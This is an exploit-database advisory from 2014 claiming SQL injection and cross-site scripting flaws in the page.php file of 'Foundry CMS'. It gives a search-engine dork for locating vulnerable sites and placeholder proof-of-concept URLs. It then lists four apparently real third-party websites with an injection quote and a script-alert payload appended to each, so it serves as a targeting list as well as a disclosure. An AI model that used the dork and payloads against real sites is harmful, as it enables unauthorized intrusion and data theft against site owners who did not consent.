Foundry CMS Multiple Vulnerability

2014-07-19T00:00:00
ID 1337DAY-ID-22450
Type zdt
Reporter Hekt0r
Modified 2014-07-19T00:00:00

Description

[+] Title: Foundry CMS Multiple Vulnerability [+] Date: 2014/07/20 [+] Author: Hekt0r [+] Vendor Homepage: www.design-foundry.co.uk [+] Tested on: Windows 7 & Kali Linux [+] Vulnerable Files: /page.php [+} Dork : intext:"Site by The Design Foundry"

                                        
                                            [+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/07/20
[+] Author: Hekt0r
[+] Vendor Homepage: www.design-foundry.co.uk
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable Files: /page.php
[+} Dork : intext:"Site by The Design Foundry"
### POC:
[+] Sql Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS:  http://site/page.php?id=[XSS]              
### Demo:
[+] Sql injection: http://www.resonatehub.co.uk/page.php?id=1'
                   http://www.sutcliffe.co.uk/page.php?id=1'
				   http://www.warmerenergyservices.com/page.php?id=25'
				   http://www.my-maintenance.com/page.php?id=1'
[+] Xss: http://www.resonatehub.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.sutcliffe.co.uk/page.php?id=<script>alert(/xss/)</script>
		 http://www.warmerenergyservices.com/page.php?id=<script>alert(/xss/)</script>
		 http://www.my-maintenance.com/page.php?id=<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire,Ali Ahmady Saeed.Jok3r, M4hdi,
                    ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net

#  0day.today [2018-01-08]  #